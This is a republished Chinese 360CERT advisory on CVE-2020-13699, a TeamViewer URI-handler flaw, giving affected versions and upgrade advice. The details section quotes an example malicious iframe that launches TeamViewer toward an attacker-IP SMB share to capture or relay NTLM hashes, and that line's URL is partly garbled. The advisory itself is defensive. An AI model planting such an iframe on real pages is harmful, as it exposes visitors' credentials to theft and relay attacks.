互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告


互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告
本文插图
【互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告】0x01 漏洞简述

2020年08月10日 ,360CERT监测发现 TeamViewer官方 发布了 TeamViewer URL 处理 的风险通告 , 该漏洞编号为 CVE-2020-13699 , 漏洞等级:高危 , 漏洞评分:8.8分 。
TeamViewer存在未引用的搜索路径或元素的安全缺陷 , 更具体地说 , 这是由于应用程序没有正确引用它的自定义URI处理程序 , 当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时 , 可能会被黑客利用 。
对此 , 360CERT建议广大用户及时将TeamViewer升级到15.8.3版本 , 下载地址为:Previous TeamViewer versions 10 – 11 – 12 – 13 – 14。 与此同时 , 请做好资产自查以及预防工作 , 以免遭受黑客攻击 。
0x02 风险等级 360CERT对该漏洞的评定结果如下
互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告
本文插图

0x03 漏洞详情 TeamViewer主要用于远程访问和控制各种类型的计算机系统和移动设备 , 但也提供协作和演示功能(例如 , 桌面共享、网络会议、文件传输等) 。

TeamViewer存在未引用的搜索路径或元素的安全缺陷 , 更具体地说 , 这是由于应用程序没有正确引用它的自定义URI处理程序 , 当安装了TeamViewer的易受攻击版本的系统访问恶意创建的网站时 , 可能会被利用 , 攻击者可以使用精心制作的URL(iframe src="http://news.hoteastday.com/a/teamviewer10: --play /attacker-IPsharefake.tvs")将恶意iframe嵌入网站中 , 这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享 。 Windows在打开SMB共享时将执行NTLM身份验证 , 并且可以将请求进行转发(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解) 。
0x04 影响版本

  • TeamViewer &lt 8.0.258861
  • TeamViewer &lt 9.0.28860
  • TeamViewer &lt 10.0.258873
  • TeamViewer &lt 11.0.258870
  • TeamViewer &lt 12.0.258869
  • TeamViewer &lt 13.2.36220
  • TeamViewer &lt 14.2.56676
  • TeamViewer &lt 15.8.3
0x05 修复建议 通用修补建议: 升级到15.8.3版本 , 下载地址为:Previous TeamViewer versions 10 – 11 – 12 – 13 – 14 。
0x06 相关空间测绘数据 360安全大脑-Quake网络空间测绘系统通过对全网资产测绘 , 发现TeamViewer在 全球 均有广泛使用 , 具体分布如下图所示 。

互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告
本文插图
0x07 产品侧解决方案 360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段 , 对该类漏洞进行监测 , 请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品 。
互联网|CVE-2020-13699:TeamViewer 用户密码破解漏洞通告
本文插图

0x08 时间线 2020-08-06 TeamViewer发布通告
2020-08-10 360CERT发布通告
0x09 参考链接
  1. Statement on CVE 2020-13699
  2. TeamViewer flaw could be exploited to crack users’ password
欢迎登录安全客 -有思想的安全新媒体www.anquanke.com/加入交流群113129131 获取更多最新资讯
原文链接: https://www.anquanke.com/post/id/213506
声明:转载此文是出于传递更多信息之目的 。 若有来源标注错误或侵犯了您的合法权益 , 请作者持权属证明与本网联系 , 我们将及时更正、删除 , 谢谢 。邮箱地址:newmedia@xxcb.cn


推荐阅读